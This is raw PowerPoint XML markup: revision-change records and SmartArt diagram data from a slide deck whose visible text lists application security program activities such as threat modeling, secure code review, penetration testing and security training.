          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:23:51.096" v="42" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315"/>
            <ac:spMk id="107" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:23:44.819" v="38" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:23:46.289" v="39" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:23:49.412" v="41" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315"/>
            <ac:spMk id="137" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:57:06.001" v="232" actId="207"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:34:36.903" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3532790246" sldId="317"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:26:55.923" v="88" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3532790246" sldId="317"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:34:36.903" v="134"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3532790246" sldId="317"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:27:15.566" v="93" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3532790246" sldId="317"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:26:57.942" v="89" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3532790246" sldId="317"/>
            <ac:spMk id="13" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:27:06.415" v="92" actId="114"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3532790246" sldId="317"/>
            <ac:graphicFrameMk id="16" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:32:49.738" v="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="872923206" sldId="318"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:32:49.738" v="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="872923206" sldId="318"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T04:47:58.509" v="2" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="872923206" sldId="318"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:34:20.372" v="131"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1698158142" sldId="320"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:26:26.320" v="80" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:34:20.372" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:26:29.442" v="81" actId="2711"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:graphicFrameMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:33:10.605" v="117"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="705852985" sldId="321"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:33:10.605" v="117"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="705852985" sldId="321"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T04:49:45.035" v="12" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="705852985" sldId="321"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:34:40.826" v="135"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1107843752" sldId="322"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:27:22.470" v="94" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1107843752" sldId="322"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:34:40.826" v="135"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1107843752" sldId="322"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldMasterChg chg="modSldLayout">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:29:37.488" v="102" actId="2711"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="0" sldId="2147483648"/>
        </pc:sldMasterMkLst>
        <pc:sldLayoutChg chg="modSp">
          <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:29:23.113" v="99" actId="2711"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="0" sldId="2147483648"/>
            <pc:sldLayoutMk cId="1105299420" sldId="2147483657"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="mod">
            <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:29:16.351" v="98" actId="2711"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="0" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1105299420" sldId="2147483657"/>
              <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="mod">
            <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:29:23.113" v="99" actId="2711"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="0" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1105299420" sldId="2147483657"/>
              <ac:spMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
            </ac:spMkLst>
          </pc:spChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="modSp">
          <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:29:37.488" v="102" actId="2711"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="0" sldId="2147483648"/>
            <pc:sldLayoutMk cId="1512606681" sldId="2147483658"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="mod">
            <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:29:29.030" v="100" actId="2711"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="0" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1512606681" sldId="2147483658"/>
              <ac:spMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="mod">
            <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:29:33.159" v="101" actId="2711"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="0" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1512606681" sldId="2147483658"/>
              <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="mod">
            <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{432395E4-6DDD-4370-A71C-8739FD3139DF}" dt="2017-10-28T06:29:37.488" v="102" actId="2711"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="0" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1512606681" sldId="2147483658"/>
              <ac:spMk id="13" creationId="{00000000-0000-0000-0000-000000000000}"/>
            </ac:spMkLst>
          </pc:spChg>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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>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indent="-82800" algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="950">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a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" b="0" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>in a Configuration Management Database (CMDB).</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protection needs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portfolio</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policies and standards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common set of reusable security controls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en-US" sz="95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security training curriculum</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="95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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="950">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>development roles and topics.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secure implementation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verification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threat modeling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secure design &amp;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review</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secure coding &amp;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code review</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penetration testing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en-US" sz="95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support services for development and project teams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> to be successful.</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Provide Management Visibility</a:t>
          </a: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indent="-82800" algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="95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capability gap analysis comparing your organization to your peers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indent="-82800" algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="95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application security awareness campaign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en-US" sz="95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common risk rating model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indent="-82800" algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="95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application security program</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> and drive adoption.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de-DE"/>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29073">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>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dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5" custScaleY="102041">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>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dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>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dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5" custScaleY="104312">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>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dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{23A55926-6632-4C49-BE69-326A87E18CBC}" type="presOf" srcId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{26ABB8A4-2126-4601-8276-CB099BFB0770}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" srcOrd="2" destOrd="0" parTransId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" sibTransId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}"/>
    <dgm:cxn modelId="{4D4901AE-986B-4432-9DC1-4E0F95A75C0C}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9478E13A-DF1E-ED49-B6C0-4CD064367697}" type="presOf" srcId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" srcOrd="1" destOrd="0" parTransId="{5330F5FD-52B0-144C-814A-D62027712440}" sibTransId="{2C02DB81-333D-C748-8AF4-65359B719E74}"/>
    <dgm:cxn modelId="{85EDB1E7-A378-4F0C-B0F9-C3AC2705555F}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{47978A9A-6752-440E-A60A-B6074541D436}" type="presOf" srcId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{86012D62-A2D0-4619-82DE-82E2DAD81915}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{426CC4D4-D837-4BC5-ADA7-F0083D714E3A}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}" srcOrd="2" destOrd="0" parTransId="{3CC2D3CB-0577-4993-B0AC-DC07BE08082D}" sibTransId="{15CFE006-FE0E-488C-A6B9-019206FFB0D8}"/>
    <dgm:cxn modelId="{EDF5A9CC-CC5C-44FB-AD2F-4A9588D299B6}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" srcOrd="3" destOrd="0" parTransId="{7BC25BDC-3278-4082-B675-15E8A5144241}" sibTransId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}"/>
    <dgm:cxn modelId="{469E487E-F0E4-4400-AA39-3813DAC2D493}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}" srcOrd="3" destOrd="0" parTransId="{8C4C6F51-54CF-4E1D-9FB8-75AB7DC25781}" sibTransId="{34F33D30-9604-4CC9-AB5D-13D7672AE842}"/>
    <dgm:cxn modelId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" srcOrd="0" destOrd="0" parTransId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" sibTransId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}"/>
    <dgm:cxn modelId="{5F96E2F6-EA13-4774-9421-1F0DDEB7BDED}" type="presOf" srcId="{ABA88485-4799-4A3E-A395-465F2466FC90}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{037BDB8F-830F-44B2-9861-7E6A03948B87}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" srcOrd="1" destOrd="0" parTransId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" sibTransId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}"/>
    <dgm:cxn modelId="{43FBE940-8BFA-4EF5-A55D-083FACE306D9}" type="presOf" srcId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9B1E24C1-9646-4B11-BED2-E864AE96290B}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{572A4DD0-8BB0-43D8-A35E-9D4C730E38BD}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0"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BEC458BC-FBE4-4D00-9454-1E14F4CB9C2D}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{ABA88485-4799-4A3E-A395-465F2466FC90}" srcOrd="1" destOrd="0" parTransId="{69D2C3E2-C6D1-4586-8000-17E989285CF4}" sibTransId="{A4B40327-8B99-4AA2-82D9-D2FD89917F3B}"/>
    <dgm:cxn modelId="{9CB74495-237D-4F40-98F9-915162C6F1AD}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" srcOrd="1" destOrd="0" parTransId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" sibTransId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" srcOrd="0" destOrd="0" parTransId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" sibTransId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}"/>
    <dgm:cxn modelId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" srcOrd="0" destOrd="0" parTransId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" sibTransId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}"/>
